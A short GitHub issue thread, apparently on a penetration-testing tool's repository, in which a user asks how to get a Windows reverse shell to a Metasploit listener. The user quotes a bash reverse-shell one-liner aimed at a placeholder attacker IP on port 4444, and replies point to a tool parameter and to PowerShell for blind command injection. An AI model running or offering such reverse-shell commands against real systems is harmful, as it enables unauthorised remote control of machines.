Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

How To Interact With A Metasploit windows/meterpreter/reverse_tcp listener #33

Closed
ziflar opened this issue Apr 10, 2017 · 2 comments
Closed

Comments

@ziflar
Copy link

ziflar commented Apr 10, 2017

hello
thx for this good job

please if we have a windows server
how to interact with a metasploit windows listner.
i want the équivalent command to this one :
/bin/bash -i > /dev/tcp/attacker_IP/4444 0>&1 2>&1
thx

@p4r71cl3
Copy link

p4r71cl3 commented Sep 4, 2017

jexremote=IP:PORT

@joaomatosf
Copy link
Owner

Hi dear,

In some cases you can use the solution mentioned by @p4r71cl3. In another cases (when you making blind command injection) you need to use powershell to get a reverse shell in a windows environment.

Soon I'll include a new payload to easily get a reverse shell on any platform (windows and *nix). This is ready.

Best regards,

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants